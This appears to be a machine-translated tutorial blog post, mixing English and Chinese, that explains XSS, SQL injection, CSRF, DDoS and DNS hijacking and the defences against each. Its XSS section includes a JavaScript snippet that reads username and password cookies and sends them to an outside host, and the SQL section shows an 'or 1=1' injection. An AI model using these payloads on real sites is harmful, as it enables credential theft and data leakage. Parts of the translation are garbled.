🎈 XSS attack
- The full name is cross-site scripting attack
Cross Site Scripting - In order to distinguish it from overlapping style sheets
CSS , another abbreviated name XSS -
XSS attacker injects malicious HTML script by tampering with the web page, usually javascript , which controls the user's browser to perform malicious operations when the user browses the web page attack -
XSS attack is often used in forums, blogs and other applications. Attackers can steal important data such as users Cookie , passwords, etc., and then forge transactions, steal user property, steal intelligence and other private information
- As shown in the figure above, if the user input in the comment box is not normal text, but a
javascript script, and the background does not process the user's data and directly stores it in the database, then when When other users come to visit the page, the browser will inevitably execute this script - Of course, this is just bad taste, and real hackers will not only satisfy such bad taste, maybe more want to get your---77f48e72953fabcf83045ec8ca10fdc5--- through these
注入脚本 个人信息 , or even you account password and other information
- As can be seen from the above figure, the user actually introduced a third-party script when commenting. In this script, the
cookie information of your browser is obtained and sent to the specified interface for saving processing, so that your information has been leaked
// attack.js 中的逻辑
var uname = $.cookie('username'); // 获取账号
var pwd = $.cookie('password'); // 获取密码
// 发送请求
$('body').appendTo('<script src=`http://autofelix.com/index.php?username=${uname}&password=${pwd}`></script>');
- In the above logic, the script obtains your personal information, and sends your personal information to the backend
php file for processing and saving, so that your personal information has been leaked, so put an end xss攻击 very important in network security - Therefore, the backend should never trust the data submitted by the user. When receiving the information submitted by the user, it must perform
消毒处理 - That is to filter some special characters, such as
javascript in the script to transfer <> <> and then store it, so that it can be effectively carried out xss --Prevention xss attacks -
cookie HttpOnly ,那么js读取到cookie信息,这样也能有效的Prevent XSS attack and steal cookie content
🎈 SQL Injection
-
SQL注入 The attack means that the attacker injects malicious SQL command into the HTTP request, and the server constructs the database with the request parameters SQL Malicious SQL is constructed together and executed in the database in order to obtain the data of interest in the database or perform sensitive operations such as reading, modifying, deleting, inserting, etc. on the database, resulting in random tampering of the data - However, the
SQL注入 attack requires the attacker to have some understanding of the database table, such as your project 开源 , and accidentally disclosed the account and password of the database; in addition, your website is online No 关闭调试模式 , those who are interested can guess the table structure based on the error echo on the website; in addition, there is 盲注 , that is, many people who are interested will guess the structure of the data table blindly, but this most difficult -
SQL注入 can be prevented by pre-compilation, and the binding parameter is the best prevention SQL injection method. SQL预编译 c9f9b68ec56e357b52a663dc523986fd---和参数绑定 ,恶意攻击的SQL会被当做SQL的参数,而不是SQL command executed
# 正常获取用户信息的sql
select * from users where id=1
# sql注入了 1 or 1=1,就可以把用户表中的所有数据全部查出,导致数据泄露
select * from users where id=1 or 1=1
🎈 CSRF attack
-
CSRF full name Cross Site Request Forgery,跨站点请求伪造 , the attacker conducts illegal operations as legitimate users through cross-site requests, such as transfer transactions, posting comments, etc. Its core is to use the browser Cookie or the server's Session strategy to steal the user's identity information -
A网站下,另开Tab页面 网站B , B页面的恶意意图 , the browser initiates a 网站A HTTP request to ---de159dfe9e764685b042fe83230bc180--- -
A网站打开了,浏览器A网站中的Cookie身份认证的信息, 恶意意图 request will automatically bring this information, which will lead to identity hijacking and result in unintended operation results - The defense strategies corresponding to
CSRF攻击 are: 表单token , 验证码 , Referer 检测 etc.
🎈 DDOS attack
-
DDOS full name Distributed Denial of Service,分布式拒绝服务攻击 . It is an upgraded version of denial of service attack. Denial of service is actually to make your service unable to provide services to users normally, which is the so-called service downtime.常用于攻击对外提供服务的服务器,像常见的: Web服务 、 邮件服务 、 DNS服务 、 即时通讯服务 - Initiating in the early stage
DoS攻击 is a very easy thing, just write a program to overload the service and have no time to provide normal service, that is, request the service multiple times in one second, run the memory of the target server collapse - Later, with the development of technology, the current servers are all distributed, not a single server provides services. There are countless behind a service
CDN节点 , and there are also countless Web服务器 . If you want to rely on a single server to attack this kind of distributed network, it is tantamount to the other party 以卵击石 , and now many DDOS 攻击 are not free, so it is easy to steal chickens without losing money. - Defense means: With the development of technology to this day, it cannot completely eliminate the appearance of such attacks, and can only be mitigated through technology. These include:
流量清洗 , SYN Cookie and more
🎈 DNS Hijacking
- In today's Internet traffic, the traffic generated by
HTTP/HTTPS Web服务 accounts for the vast majority -
Web服务 DNS ip地址 is in full swing, behind this is inseparable from an unknown hero is the domain name resolution system. The resolution of the domain name must go through DNS , so we can see its importance - It is precisely because of its importance that
DNS劫持 is easily exploited by people with ulterior motives - In the early days, there was not much consideration for security, so it led to
DNS is easy to be hijacked - If the attacker tampered with the
DNS解析 setting, and changed the domain name from the normal IP to the illegal IP controlled by the attacker, it would cause us to access the domain name but not the corresponding one. The website is a fake or a website with ulterior motives. This attack method is DNS劫持 - Through
DNS劫持 simple point can lead to the loss of users, serious consequences can even induce users to illegal websites controlled by attackers, which may lead to the leakage of important information such as bank card numbers, mobile phone numbers, account passwords, etc. - Later,
DNSSEC technology appeared. Although it solved the hijacking problem to a certain extent, there were not many cases of application in China. Therefore, Alibaba and Tencent launched the httpDNS service to a certain extent. can suppress this attack - Alternatively
安装SSL证书 . The SSL certificate has the function of server authentication, which can make the connection error caused by DNS hijacking detected and terminated in time
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用。你还可以使用@来通知其他用户。